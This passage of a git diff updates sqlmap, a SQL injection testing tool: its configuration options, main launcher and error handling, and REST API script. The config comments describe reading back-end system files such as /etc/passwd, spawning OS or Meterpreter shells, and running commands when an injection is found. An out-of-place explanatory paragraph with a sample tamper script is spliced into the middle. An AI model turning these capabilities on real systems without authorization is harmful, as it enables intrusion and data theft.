(sqlmap will start to retrieve the table dump entries from +# first one) limitStart = 0 # Last query output entry to retrieve # Valid: integer -# Default: 0 (sqlmap will detect the number of query output entries and +# Default: 0 (sqlmap will detect the number of table dump entries and # retrieve them until the last) limitStop = 0 @@ -447,7 +591,7 @@ lastChar = 0 # SQL statement to be executed. # Example: SELECT 'foo', 'bar' -query = +sqlQuery = # Prompt for an interactive SQL shell. # Valid: True or False @@ -468,6 +612,10 @@ commonTables = False # Valid: True or False commonColumns = False +# Check existence of common files. +# Valid: True or False +commonFiles = False + # These options can be used to create custom user-defined functions. 
[User-defined function] @@ -486,15 +634,15 @@ shLib = # Read a specific file from the back-end DBMS underlying file system. # Examples: /etc/passwd or C:\boot.ini -rFile = +fileRead = # Write a local file to a specific path on the back-end DBMS underlying # file system. # Example: /tmp/sqlmap.txt or C:\WINNT\Temp\sqlmap.txt -wFile = +fileWrite = # Back-end DBMS absolute filepath to write the file to. -dFile = +fileDest = # These options can be used to access the back-end database management @@ -509,11 +657,11 @@ osCmd = # Valid: True or False osShell = False -# Prompt for an out-of-band shell, meterpreter or VNC. +# Prompt for an out-of-band shell, Meterpreter or VNC. # Valid: True or False osPwn = False -# One click prompt for an out-of-band shell, meterpreter or VNC. +# One click prompt for an out-of-band shell, Meterpreter or VNC. # Valid: True or False osSmb = False @@ -568,41 +716,62 @@ regType = # These options can be used to set some general working parameters. [General] +# Load session from a stored (.sqlite) file +# Example: output/www.target.com/session.sqlite +sessionFile = + # Log all HTTP traffic into a textual file. trafficFile = +# Abort data retrieval on empty results. +abortOnEmpty = False + +# Set predefined answers (e.g. "quit=N,follow=N"). +answers = + +# Parameter(s) containing Base64 encoded data +base64Parameter = + +# Use URL and filename safe Base64 alphabet (Reference: https://en.wikipedia.org/wiki/Base64#URL_applications). +# Valid: True or False +base64Safe = False + # Never ask for user input, use the default behaviour. # Valid: True or False batch = False -# Force character encoding used for data retrieval. -charset = +# Result fields having binary values (e.g. "digest"). +binaryFields = -# Check to see if Tor is used properly. +# Check Internet connection before assessing the target. +checkInternet = False + +# Clean up the DBMS from sqlmap specific UDF and tables. # Valid: True or False -checkTor = False +cleanup = False -# Crawl the website starting from the target url. +# Crawl the website starting from the target URL. # Valid: integer # Default: 0 crawlDepth = 0 +# Regexp to exclude pages from crawling (e.g. "logout"). +crawlExclude = + # Delimiting character used in CSV output. # Default: , csvDel = , -# DBMS authentication credentials (user:password). Useful if you want to -# run SQL statements as another user, the back-end database management -# system is PostgreSQL or Microsoft SQL Server and the parameter is -# vulnerable by stacked queries SQL injection or you are connecting directly -# to the DBMS (-d switch). -# Syntax: username:password -dbmsCred = +# Store dumped data to a custom file. +dumpFile = # Format of dumped data # Valid: CSV, HTML or SQLITE dumpFormat = CSV +# Force character encoding used for data retrieval. +encoding = + # Retrieve each query output length and calculate the estimated time of # arrival in real time. # Valid: True or False @@ -612,70 +781,87 @@ eta = False # Valid: True or False flushSession = False -# Parse and test forms on target url. +# Parse and test forms on target URL. # Valid: True or False forms = False -# Ignores query results stored in session file. +# Ignore query results stored in session file. # Valid: True or False freshQueries = False -# Uses DBMS hex function(s) for data retrieval. +# Use Google dork results from specified page number. +# Valid: integer +# Default: 1 +googlePage = 1 + +# Use hex conversion during data retrieval. # Valid: True or False hexConvert = False # Custom output directory path. 
-oDir = +outputDir = # Parse and display DBMS error messages from responses. # Valid: True or False parseErrors = False -# Use Use Tor anonymity network. +# Use given script(s) for preprocessing of request. +preprocess = + +# Use given script(s) for postprocessing of response data. +postprocess = + +# Redump entries having unknown character marker (?). # Valid: True or False -tor = False +repair = False -# Set Tor proxy port other than default. -# Valid: integer -# torPort = +# Regular expression for filtering targets from provided Burp. +# or WebScarab proxy log. +# Example: (google|yahoo) +scope = -# Set Tor proxy type. -# Valid: HTTP, SOCKS4, SOCKS5 -torType = HTTP +# Skip heuristic detection of SQLi/XSS vulnerabilities. +# Valid: True or False +skipHeuristics = False -# Update sqlmap. +# Skip heuristic detection of WAF/IPS protection. # Valid: True or False -updateAll = False +skipWaf = False +# Prefix used for temporary tables. +# Default: sqlmap +tablePrefix = sqlmap -[Miscellaneous] +# Select tests by payloads and/or titles (e.g. ROW). +testFilter = -# Use short mnemonics (e.g. "flu,bat,ban,tec=EU"). -mnemonics = +# Skip tests by payloads and/or titles (e.g. BENCHMARK). +testSkip = -# Run shell command(s) when SQL injection is found. -alert = +# Run with a time limit in seconds (e.g. 3600). +timeLimit = -# Set question answers (e.g. "quit=N,follow=N"). -answers = +# Disable escaping of DBMS identifiers (e.g. "user"). +unsafeNaming = False -# Make a beep sound when SQL injection is found. -# Valid: True or False -beep = False +# Web server document root directory (e.g. "/var/www"). +webRoot = -# Offline WAF/IPS/IDS payload detection testing. -# Valid: True or False -checkPayload = False -# Check for existence of WAF/IPS/IDS protection. +[Miscellaneous] + +# Run host OS command(s) when SQL injection is found. +alert = + +# Beep on question and/or when SQL injection is found. # Valid: True or False -checkWaf = False +beep = False -# Clean up the DBMS by sqlmap specific UDF and tables. +# Offline WAF/IPS payload detection testing. # Valid: True or False -cleanup = False +checkPayload = False -# Check for missing (non-core) sqlmap dependencies. +# Check for missing (optional) sqlmap dependencies. # Valid: True or False dependencies = False @@ -683,29 +869,39 @@ dependencies = False # Valid: True or False disableColoring = False -# Use Google dork results from specified page number. -# Valid: integer -# Default: 1 -googlePage = 1 +# Disable hash analysis on table dumps. +# Valid: True or False +disableHashing = False -# Use HTTP parameter pollution. +# Display list of available tamper scripts. # Valid: True or False -hpp = False +listTampers = False -# Imitate smartphone through HTTP User-Agent header. +# Disable logging to a file. # Valid: True or False -mobile = False +noLogging = False -# Display page rank (PR) for Google dork results. +# Disable console output truncation. # Valid: True or False -pageRank = False +noTruncate = False -# Conduct through tests only if positive heuristic(s). +# Work in offline mode (only use session data) # Valid: True or False -smart = False +offline = False -# Select tests by payloads and/or titles (e.g. ROW) -testFilter = +# Location of CSV results file in multiple targets mode. +resultsFile = + +# Local directory for storing temporary files. +tmpDir = + +# Adjust options for unstable connections. +# Valid: True or False +unstable = False + +# Update sqlmap. +# Valid: True or False +updateAll = False # Simple wizard interface for beginner users. 
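The reworked [Miscellaneous] section adds listTampers for printing the bundled tamper scripts, while testFilter/testSkip select or skip payloads by title. The tamper/ scripts added later in this diff all follow the same small contract: a module-level __priority__, an optional dependencies() hook, and a tamper(payload, **kwargs) function that returns the transformed payload, usually with a doctest. A minimal custom script modeled on them could look like the sketch below; the transformation itself is purely illustrative and not part of the diff.

```python
#!/usr/bin/env python

# Minimal sketch of a user-written tamper script, modeled on the scripts added
# in this diff (e.g. tamper/equaltorlike.py). The transformation shown here
# (doubling every space) is illustrative only.

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass  # optionally emit a singleTimeWarnMessage() about the intended DBMS

def tamper(payload, **kwargs):
    """
    Replaces each space in the payload with two spaces

    >>> tamper('1 AND 2>1')
    '1  AND  2>1'
    """

    return re.sub(r" ", "  ", payload) if payload else payload
```

Like the bundled scripts, such a module would be enabled with the --tamper option.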
# Valid: True or False diff --git a/sqlmap.py b/sqlmap.py index 269be8157c5..5e93ef2c83d 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -1,17 +1,637 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import sys +from __future__ import print_function -PYVERSION = sys.version.split()[0] +try: + import sys -if PYVERSION >= "3" or PYVERSION < "2.6": - exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6 or 2.7 (visit 'http://www.python.org/download/')" % PYVERSION) -elif __name__ == "__main__": - from _sqlmap import main - from lib.controller.controller import start # needed for proper working of --profile switch - main() + sys.dont_write_bytecode = True + + try: + __import__("lib.utils.versioncheck") # this has to be the first non-standard import + except ImportError: + sys.exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details") + + import bdb + import glob + import inspect + import json + import logging + import os + import re + import shutil + import sys + import tempfile + import threading + import time + import traceback + import warnings + + if "--deprecations" not in sys.argv: + warnings.filterwarnings(action="ignore", category=DeprecationWarning) + else: + warnings.resetwarnings() + warnings.filterwarnings(action="ignore", message="'crypt'", category=DeprecationWarning) + warnings.simplefilter("ignore", category=ImportWarning) + if sys.version_info >= (3, 0): + warnings.simplefilter("ignore", category=ResourceWarning) + + warnings.filterwarnings(action="ignore", message="Python 2 is no longer supported") + warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) + warnings.filterwarnings(action="ignore", message=".*using a very old release", category=UserWarning) + warnings.filterwarnings(action="ignore", message=".*default buffer size will be used", category=RuntimeWarning) + warnings.filterwarnings(action="ignore", category=UserWarning, module="psycopg2") + + from lib.core.data import logger + + from lib.core.common import banner + from lib.core.common import checkPipedInput + from lib.core.common import checkSums + from lib.core.common import createGithubIssue + from lib.core.common import dataToStdout + from lib.core.common import extractRegexResult + from lib.core.common import filterNone + from lib.core.common import getDaysFromLastUpdate + from lib.core.common import getFileItems + from lib.core.common import getSafeExString + from lib.core.common import maskSensitiveData + from lib.core.common import openFile + from lib.core.common import setPaths + from lib.core.common import weAreFrozen + from lib.core.convert import getUnicode + from lib.core.common import setColor + from lib.core.common import unhandledExceptionMessage + from lib.core.compat import LooseVersion + from lib.core.compat import xrange + from lib.core.data import cmdLineOptions + from lib.core.data import conf + from lib.core.data import kb + from lib.core.datatype import OrderedSet + from lib.core.enums import MKSTEMP_PREFIX + from lib.core.exception import SqlmapBaseException + from lib.core.exception import SqlmapShellQuitException + from lib.core.exception import SqlmapSilentQuitException + from lib.core.exception 
import SqlmapUserQuitException + from lib.core.option import init + from lib.core.option import initOptions + from lib.core.patch import dirtyPatches + from lib.core.patch import resolveCrossReferences + from lib.core.settings import GIT_PAGE + from lib.core.settings import IS_WIN + from lib.core.settings import LAST_UPDATE_NAGGING_DAYS + from lib.core.settings import LEGAL_DISCLAIMER + from lib.core.settings import THREAD_FINALIZATION_TIMEOUT + from lib.core.settings import UNICODE_ENCODING + from lib.core.settings import VERSION + from lib.parse.cmdline import cmdLineParser + from lib.utils.crawler import crawl +except KeyboardInterrupt: + errMsg = "user aborted" + + if "logger" in globals(): + logger.critical(errMsg) + raise SystemExit + else: + import time + sys.exit("\r[%s] [CRITICAL] %s" % (time.strftime("%X"), errMsg)) + +def modulePath(): + """ + This will get us the program's directory, even if we are frozen + using py2exe + """ + + try: + _ = sys.executable if weAreFrozen() else __file__ + except NameError: + _ = inspect.getsourcefile(modulePath) + + return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) + +def checkEnvironment(): + try: + os.path.isdir(modulePath()) + except UnicodeEncodeError: + errMsg = "your system does not properly handle non-ASCII paths. " + errMsg += "Please move the sqlmap's directory to the other location" + logger.critical(errMsg) + raise SystemExit + + if LooseVersion(VERSION) < LooseVersion("1.0"): + errMsg = "your runtime environment (e.g. PYTHONPATH) is " + errMsg += "broken. Please make sure that you are not running " + errMsg += "newer versions of sqlmap with runtime scripts for older " + errMsg += "versions" + logger.critical(errMsg) + raise SystemExit + + # Patch for pip (import) environment + if "sqlmap.sqlmap" in sys.modules: + for _ in ("cmdLineOptions", "conf", "kb"): + globals()[_] = getattr(sys.modules["lib.core.data"], _) + + for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"): + globals()[_] = getattr(sys.modules["lib.core.exception"], _) + +def main(): + """ + Main function of sqlmap when running from command line. + """ + + try: + dirtyPatches() + resolveCrossReferences() + checkEnvironment() + setPaths(modulePath()) + banner() + + # Store original command line options for possible later restoration + args = cmdLineParser() + cmdLineOptions.update(args.__dict__ if hasattr(args, "__dict__") else args) + initOptions(cmdLineOptions) + + if checkPipedInput(): + conf.batch = True + + if conf.get("api"): + # heavy imports + from lib.utils.api import StdDbOut + from lib.utils.api import setRestAPILog + + # Overwrite system standard output and standard error to write + # to an IPC database + sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") + sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") + + setRestAPILog() + + conf.showTime = True + dataToStdout("[!] 
legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) + dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) + + init() + + if not conf.updateAll: + # Postponed imports (faster start) + if conf.smokeTest: + from lib.core.testing import smokeTest + os._exitcode = 1 - (smokeTest() or 0) + elif conf.vulnTest: + from lib.core.testing import vulnTest + os._exitcode = 1 - (vulnTest() or 0) + else: + from lib.controller.controller import start + if conf.profile: + from lib.core.profiling import profile + globals()["start"] = start + profile() + else: + try: + if conf.crawlDepth and conf.bulkFile: + targets = getFileItems(conf.bulkFile) + + for i in xrange(len(targets)): + target = None + + try: + kb.targets = OrderedSet() + target = targets[i] + + if not re.search(r"(?i)\Ahttp[s]*://", target): + target = "https://%s" % target + + infoMsg = "starting crawler for target URL '%s' (%d/%d)" % (target, i + 1, len(targets)) + logger.info(infoMsg) + + crawl(target) + except Exception as ex: + if target and not isinstance(ex, SqlmapUserQuitException): + errMsg = "problem occurred while crawling '%s' ('%s')" % (target, getSafeExString(ex)) + logger.error(errMsg) + else: + raise + else: + if kb.targets: + start() + else: + start() + except Exception as ex: + os._exitcode = 1 + + if "can't start new thread" in getSafeExString(ex): + errMsg = "unable to start new threads. Please check OS (u)limits" + logger.critical(errMsg) + raise SystemExit + else: + raise + + except SqlmapUserQuitException: + if not conf.batch: + errMsg = "user quit" + logger.error(errMsg) + + except (SqlmapSilentQuitException, bdb.BdbQuit): + pass + + except SqlmapShellQuitException: + cmdLineOptions.sqlmapShell = False + + except SqlmapBaseException as ex: + errMsg = getSafeExString(ex) + logger.critical(errMsg) + + os._exitcode = 1 + + raise SystemExit + + except KeyboardInterrupt: + try: + print() + except IOError: + pass + + except EOFError: + print() + + errMsg = "exit" + logger.error(errMsg) + + except SystemExit as ex: + os._exitcode = ex.code or 0 + + except: + print() + errMsg = unhandledExceptionMessage() + excMsg = traceback.format_exc() + valid = checkSums() + + os._exitcode = 255 + + if any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")): + errMsg = "memory exhaustion detected" + logger.critical(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded", "Disk full while accessing")): + errMsg = "no space left on output device" + logger.critical(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("The paging file is too small",)): + errMsg = "no space left for paging file" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("Access is denied", "subprocess", "metasploit")): + errMsg = "permission error occurred while running Metasploit" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("Permission denied", "metasploit")): + errMsg = "permission error occurred while using Metasploit" + logger.critical(errMsg) + raise SystemExit + + elif "Read-only file system" in excMsg: + errMsg = "output device is mounted as read-only" + logger.critical(errMsg) + raise SystemExit + + elif "Insufficient system resources" in excMsg: + errMsg = "resource exhaustion detected" + logger.critical(errMsg) + raise SystemExit + + elif "OperationalError: disk I/O error" in excMsg: + errMsg = "I/O error on output device" + logger.critical(errMsg) + raise SystemExit + + elif "Violation 
of BIDI" in excMsg: + errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" + logger.critical(errMsg) + raise SystemExit + + elif "Invalid IPv6 URL" in excMsg: + errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1] + logger.critical(errMsg) + raise SystemExit + + elif "_mkstemp_inner" in excMsg: + errMsg = "there has been a problem while accessing temporary files" + logger.critical(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp", "tempfile.py")): + errMsg = "unable to write to the temporary directory '%s'. " % tempfile.gettempdir() + errMsg += "Please make sure that your disk is not full and " + errMsg += "that you have sufficient write permissions to " + errMsg += "create temporary files and/or directories" + logger.critical(errMsg) + raise SystemExit + + elif "Permission denied: '" in excMsg: + match = re.search(r"Permission denied: '([^']*)", excMsg) + errMsg = "permission error occurred while accessing file '%s'" % match.group(1) + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): + errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " + errMsg += "(Reference: 'https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe')" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("httpcore", "typing.", "AttributeError")): + errMsg = "please update the 'httpcore' package (>= 1.0.8) " + errMsg += "(Reference: 'https://github.com/encode/httpcore/discussions/995')" + logger.critical(errMsg) + raise SystemExit + + elif "invalid maximum character passed to PyUnicode_New" in excMsg and re.search(r"\A3\.[34]", sys.version) is not None: + errMsg = "please upgrade the Python version (>= 3.5) " + errMsg += "(Reference: 'https://bugs.python.org/issue18183')" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): + errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " + errMsg += "(Reference: 'https://github.com/PyMySQL/PyMySQL/issues/700')" + logger.critical(errMsg) + raise SystemExit + + elif "must be pinned buffer, not bytearray" in excMsg: + errMsg = "error occurred at Python interpreter which " + errMsg += "is fixed in 2.7. Please update accordingly " + errMsg += "(Reference: 'https://bugs.python.org/issue8104')" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("OSError: [Errno 22] Invalid argument: '", "importlib")): + errMsg = "unable to read file '%s'" % extractRegexResult(r"OSError: \[Errno 22\] Invalid argument: '(?P<result>[^']+)", excMsg) + logger.critical(errMsg) + raise SystemExit + + elif "hash_randomization" in excMsg: + errMsg = "error occurred at Python interpreter which " + errMsg += "is fixed in 2.7.3. Please update accordingly " + errMsg += "(Reference: 'https://docs.python.org/2/library/sys.html')" + logger.critical(errMsg) + raise SystemExit + + elif "AttributeError:" in excMsg and re.search(r"3\.11\.\d+a", sys.version): + errMsg = "there is a known issue when sqlmap is run with ALPHA versions of Python 3.11. " + errMsg += "Please download a stable Python version" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("Resource temporarily unavailable", "os.fork()", "dictionaryAttack")): + errMsg = "there has been a problem while running the multiprocessing hash cracking. 
" + errMsg += "Please rerun with option '--threads=1'" + logger.critical(errMsg) + raise SystemExit + + elif "can't start new thread" in excMsg: + errMsg = "there has been a problem while creating new thread instance. " + errMsg += "Please make sure that you are not running too many processes" + if not IS_WIN: + errMsg += " (or increase the 'ulimit -u' value)" + logger.critical(errMsg) + raise SystemExit + + elif "can't allocate read lock" in excMsg: + errMsg = "there has been a problem in regular socket operation " + errMsg += "('%s')" % excMsg.strip().split('\n')[-1] + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("pymysql", "configparser")): + errMsg = "wrong initialization of 'pymsql' detected (using Python3 dependencies)" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("ntlm", "socket.error, err", "SyntaxError")): + errMsg = "wrong initialization of 'python-ntlm' detected (using Python2 syntax)" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("drda", "to_bytes")): + errMsg = "wrong initialization of 'drda' detected (using Python3 syntax)" + logger.critical(errMsg) + raise SystemExit + + elif "'WebSocket' object has no attribute 'status'" in excMsg: + errMsg = "wrong websocket library detected" + errMsg += " (Reference: 'https://github.com/sqlmapproject/sqlmap/issues/4572#issuecomment-775041086')" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("window = tkinter.Tk()",)): + errMsg = "there has been a problem in initialization of GUI interface " + errMsg += "('%s')" % excMsg.strip().split('\n')[-1] + logger.critical(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("unable to access item 'liveTest'",)): + errMsg = "detected usage of files from different versions of sqlmap" + logger.critical(errMsg) + raise SystemExit + + elif any(_ in errMsg for _ in (": 9.9.9#",)): + errMsg = "LOL xD" + logger.critical(errMsg) + raise SystemExit + + elif kb.get("dumpKeyboardInterrupt"): + raise SystemExit + + elif any(_ in excMsg for _ in ("Broken pipe", "KeyboardInterrupt")): + raise SystemExit + + elif valid is False: + errMsg = "code checksum failed (turning off automatic issue creation). 
" + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.critical(errMsg) + print() + dataToStdout(excMsg) + raise SystemExit + + elif any(_ in "%s\n%s" % (errMsg, excMsg) for _ in ("tamper/", "waf/", "--engagement-dojo")): + logger.critical(errMsg) + print() + dataToStdout(excMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "<frozen", "Can't find file for module", "SAXReaderNotAvailable", "<built-in function compile> returned NULL without setting an exception", "source code string cannot contain null bytes", "No module named", "tp_name field", "module 'sqlite3' has no attribute 'OperationalError'")): + errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("SyntaxError: Non-ASCII character", ".py on line", "but no encoding declared")): + errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("FileNotFoundError: [Errno 2] No such file or directory", "cwd = os.getcwd()")): + errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("PermissionError: [WinError 5]", "multiprocessing")): + errMsg = "there is a permission problem in running multiprocessing on this system. " + errMsg += "Please rerun with '--disable-multi'" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("No such file", "_'")): + errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("No such file", "sqlmap.conf", "Test")): + errMsg = "you are trying to run (hidden) development tests inside the production environment" + logger.critical(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("HTTPNtlmAuthHandler", "'str' object has no attribute 'decode'")): + errMsg = "package 'python-ntlm' has a known compatibility issue with the " + errMsg += "Python 3 (Reference: 'https://github.com/mullender/python-ntlm/pull/61')" + logger.critical(errMsg) + raise SystemExit + + elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): + errMsg = "there has been a problem in enumeration. " + errMsg += "Because of a considerable chance of false-positive case " + errMsg += "you are advised to rerun with switch '--flush-session'" + logger.critical(errMsg) + raise SystemExit + + elif "database disk image is malformed" in excMsg: + errMsg = "local session file seems to be malformed. 
Please rerun with '--flush-session'" + logger.critical(errMsg) + raise SystemExit + + elif "'cryptography' package is required" in excMsg: + errMsg = "third-party library 'cryptography' is required" + logger.critical(errMsg) + raise SystemExit + + elif "AttributeError: 'module' object has no attribute 'F_GETFD'" in excMsg: + errMsg = "invalid runtime (\"%s\") " % excMsg.split("Error: ")[-1].strip() + errMsg += "(Reference: 'https://stackoverflow.com/a/38841364' & 'https://bugs.python.org/issue24944#msg249231')" + logger.critical(errMsg) + raise SystemExit + + elif "bad marshal data (unknown type code)" in excMsg: + match = re.search(r"\s*(.+)\s+ValueError", excMsg) + errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") + errMsg += ". Please delete .pyc files on your system to fix the problem" + logger.critical(errMsg) + raise SystemExit + + for match in re.finditer(r'File "(.+?)", line', excMsg): + file_ = match.group(1) + try: + file_ = os.path.relpath(file_, os.path.dirname(__file__)) + except ValueError: + pass + file_ = file_.replace("\\", '/') + if "../" in file_: + file_ = re.sub(r"(\.\./)+", '/', file_) + else: + file_ = file_.lstrip('/') + file_ = re.sub(r"/{2,}", '/', file_) + excMsg = excMsg.replace(match.group(1), file_) + + errMsg = maskSensitiveData(errMsg) + excMsg = maskSensitiveData(excMsg) + + if conf.get("api") or not valid or kb.get("lastCtrlCTime"): + logger.critical("%s\n%s" % (errMsg, excMsg)) + else: + logger.critical(errMsg) + dataToStdout("%s\n" % setColor(excMsg.strip(), level=logging.CRITICAL)) + createGithubIssue(errMsg, excMsg) + + finally: + kb.threadContinue = False + + if (getDaysFromLastUpdate() or 0) > LAST_UPDATE_NAGGING_DAYS: + warnMsg = "your sqlmap version is outdated" + logger.warning(warnMsg) + + if conf.get("showTime"): + dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) + + kb.threadException = True + + for tempDir in conf.get("tempDirs", []): + for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): + for filepath in glob.glob(os.path.join(tempDir, "%s*" % prefix)): + try: + os.remove(filepath) + except OSError: + pass + + if any((conf.vulnTest, conf.smokeTest)) or not filterNone(filepath for filepath in glob.glob(os.path.join(tempDir, '*')) if not any(filepath.endswith(_) for _ in (".lock", ".exe", ".so", '_'))): # ignore junk files + try: + shutil.rmtree(tempDir, ignore_errors=True) + except OSError: + pass + + if conf.get("hashDB"): + conf.hashDB.flush() + conf.hashDB.close() # NOTE: because of PyPy + + if conf.get("harFile"): + try: + with openFile(conf.harFile, "w+") as f: + json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) + except SqlmapBaseException as ex: + errMsg = getSafeExString(ex) + logger.critical(errMsg) + + if conf.get("api"): + conf.databaseCursor.disconnect() + + if conf.get("dumper"): + conf.dumper.flush() + + # short delay for thread finalization + _ = time.time() + while threading.active_count() > 1 and (time.time() - _) < THREAD_FINALIZATION_TIMEOUT: + time.sleep(0.01) + + if cmdLineOptions.get("sqlmapShell"): + cmdLineOptions.clear() + conf.clear() + kb.clear() + conf.disableBanner = True + main() + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + pass + except SystemExit: + raise + except: + traceback.print_exc() + finally: + # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program + if 
threading.active_count() > 1: + os._exit(getattr(os, "_exitcode", 0)) + else: + sys.exit(getattr(os, "_exitcode", 0)) +else: + # cancelling postponed imports (because of CI/CD checks) + __import__("lib.controller.controller") diff --git a/sqlmapapi.py b/sqlmapapi.py index 8e1e12bbd97..99862b65bc6 100755 --- a/sqlmapapi.py +++ b/sqlmapapi.py @@ -1,44 +1,117 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import sys + +sys.dont_write_bytecode = True + +__import__("lib.utils.versioncheck") # this has to be the first non-standard import + import logging -import optparse +import os +import warnings + +warnings.filterwarnings(action="ignore", category=UserWarning) +warnings.filterwarnings(action="ignore", category=DeprecationWarning) + +try: + from optparse import OptionGroup + from optparse import OptionParser as ArgumentParser + + ArgumentParser.add_argument = ArgumentParser.add_option + + def _add_argument(self, *args, **kwargs): + return self.add_option(*args, **kwargs) + + OptionGroup.add_argument = _add_argument + +except ImportError: + from argparse import ArgumentParser + +finally: + def get_actions(instance): + for attr in ("option_list", "_group_actions", "_actions"): + if hasattr(instance, attr): + return getattr(instance, attr) -from _sqlmap import modulePath + def get_groups(parser): + return getattr(parser, "option_groups", None) or getattr(parser, "_action_groups") + + def get_all_options(parser): + retVal = set() + + for option in get_actions(parser): + if hasattr(option, "option_strings"): + retVal.update(option.option_strings) + else: + retVal.update(option._long_opts) + retVal.update(option._short_opts) + + for group in get_groups(parser): + for option in get_actions(group): + if hasattr(option, "option_strings"): + retVal.update(option.option_strings) + else: + retVal.update(option._long_opts) + retVal.update(option._short_opts) + + return retVal + +from lib.core.common import getUnicode from lib.core.common import setPaths -from lib.core.data import paths from lib.core.data import logger +from lib.core.patch import dirtyPatches +from lib.core.patch import resolveCrossReferences +from lib.core.settings import RESTAPI_DEFAULT_ADAPTER +from lib.core.settings import RESTAPI_DEFAULT_ADDRESS +from lib.core.settings import RESTAPI_DEFAULT_PORT +from lib.core.settings import UNICODE_ENCODING from lib.utils.api import client from lib.utils.api import server -RESTAPI_SERVER_HOST = "127.0.0.1" -RESTAPI_SERVER_PORT = 8775 +try: + from sqlmap import modulePath +except ImportError: + def modulePath(): + return getUnicode(os.path.dirname(os.path.realpath(__file__)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) -if __name__ == "__main__": +def main(): """ REST-JSON API main function """ + + dirtyPatches() + resolveCrossReferences() + # Set default logging level to debug logger.setLevel(logging.DEBUG) - # Initialize path variable - paths.SQLMAP_ROOT_PATH = modulePath() - setPaths() + # Initialize paths + setPaths(modulePath()) # Parse command line options - apiparser = optparse.OptionParser() - apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_SERVER_PORT, action="store_true") - apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_SERVER_PORT, action="store_true") - 
